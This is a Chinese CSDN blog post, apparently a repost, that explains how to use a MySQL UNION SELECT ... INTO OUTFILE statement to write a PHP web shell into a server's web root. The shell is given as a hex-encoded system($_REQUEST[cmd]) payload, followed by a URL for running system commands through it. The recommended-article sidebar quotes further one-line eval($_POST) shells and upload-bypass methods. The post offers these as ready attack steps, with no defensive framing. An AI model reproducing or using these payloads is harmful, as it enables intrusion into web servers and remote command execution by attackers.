利用mysql上传木马_用MySQL语句来对后门木马进行生成的操作步骤

最新推荐文章于 2021-09-09 16:03:53 发布
最新推荐文章于 2021-09-09 16:03:53 发布
阅读量134 收藏
点赞数
文章标签: 利用mysql上传木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39910043/article/details/113256352
版权

以下的文章主要介绍的是通过MySQL语句来对后门木马进行生成的实际解决方法,其实是实现用MySQL语句来对后门木马进行生成是一件十分简单的事情,只要你掌握了其实际操作程序即可。

通过MySQL 的语句生成后门木马的方法!

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过MySQL 的注入或者在 phpmyadmin 里运行以上MySQL语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

4d9a90d417a2a79dc4225b158fcbe412.png

上述的相关内容就是对通过MySQL语句生成后门木马的方法的描述,希望会给你带来一些帮助在此方面。

【编辑推荐】

【责任编辑:孙巧华 TEL:(010)68476606】

点赞 0

weixin_39910043
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL写马详解
jklbnm12的博客
08-14 1901
日志写马 条件 1.全局变量general_log为ON MySQL的两个全局变量: general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general_log_file 指的是日志的保存路径。 mysql> show global variables like "%general\_log%";+------------------+--------------------------------------------------------+|
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 319
复现mysql 备份上传木马,并用shell工具连接操作
利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
weixin_32008105的博客
02-05 238
通过Mysql语句生成后门木马的方法!SELECT * FROM `vbb_strikes`WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
Mysql注入上传木马提权
Jim的博客
09-13 1149
上传暗月大马
mysql传马_Mysql的写马与提权
weixin_31289551的博客
01-18 704
密码读取直接从配置文件中读取数据库账号密码爆破账号密码读取数据库目录中的user.MYD,root后的字符串为其用户加密值,在线解密或者hashcat即可脱库利用条件:权限为rootsecure_file_priv没有具体值show global variables like '%secure_file_priv%'; 查看secure_file_priv的值secure_file_priv的值为...
MySQL中使用JOIN语句进行连接操作的详细教程
01-21
MySQL中联接(join)行为是指两个或多个表到一个表中可以使用连接在SELECT,UPDATE和DELETE语句中加入MySQL表。我们将看到一个例子LEFT JOIN简单的MySQL连接。 在命令提示符使用联接: 假设我们两个表的教程tcount_...
mysql——QT.rar_MYSQL_qt mysql_qt操作MySQL接口_qt系统
09-24
利用QT实现了简单的mysql接口,所实现的是图书管理系统 图书管理系统包括了借书,还书,管理用户等等功能
mysql.rar_mysql语句
09-19
mysql中的一些基本语句,包括增加、删除、修改等功能,可以重复使用。
MySQL.rar_mysql语句
09-21
MySQL语法语句大全,这是多年我收集整理出来的实用文档
利用可视化软件navicat对mysql进行语句查询的使用(增删改查)
12-14
增:insert 语法:INSERT [INTO] 表values (值列表) INSERT INTO person (username,password,address) VALUES ('admin1',123,'重庆') 写完之后点击图中的运行,下同。 例如下图: 删: delete ...
MySQL注入之木马上传拿webshell
热门推荐
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
weixin_34135180的博客
01-21 182
通过Mysql语句生成后门木马的方法!SELECT * FROM `vbb_strikes`WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
SQL注入MySQL中写入木马getshell的两种方法
qq_41187177的博客
09-09 4127
SQL注入MySQL中写入木马getshell的两种方法 1.利用into outfile直接写入木马文件 利用条件: 1.知道网站的绝对路径 2.secure_file_priv不能为null 3.具有写入文件的权限 案例: 1.利用into outfile写入木马文件 select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php" 2.利用日志文件写入木马 1.开启日志功能 set
数据库上传一句话木马的三种姿势
世间繁华梦一出
11-08 816
上传一句话木马的基础知识
MSSQL注入之木马上传拿webshell
Jim的博客
08-16 4361
1.检测是否存在注入点:依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点 2.利用语句:a' having 1=1--爆出表名和字段名AdminUser.AdminId 3.接着爆出其他字段: a' group by adminuser.adminid having 1=1--  //爆出用户名字段 a' group by adminuser.adminid,adm
mysql文件上传漏洞_文件上传漏洞
weixin_34061121的博客
01-28 190
文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。0x01文件上传校验姿势(1)客户端javascript校验(一般只校验后缀名)(2)服务端校验文件头content-type字段校验(image/gif)文件内容头校验(GIF89a)后缀...
php网站上传木马,php一句话木马怎么上传
weixin_29955195的博客
03-09 2294
一句话木马上传常见的几种方法:1、利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束...
PHP操作MySQL数据库分为四个步骤,它们____到MySQL数据库服务器、____数据库、____SQL语句、____到MySQL数据库服务器的连接。
最新发布
06-09
3. 执行SQL语句:使用 `mysqli_query()` 函数执行 SQL 语句,包括查询、插入、更新、删除等操作。 4. 关闭MySQL数据库连接:使用 `mysqli_close()` 函数关闭与 MySQL 数据库服务器的连接,释放资源。 这些步骤是在 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值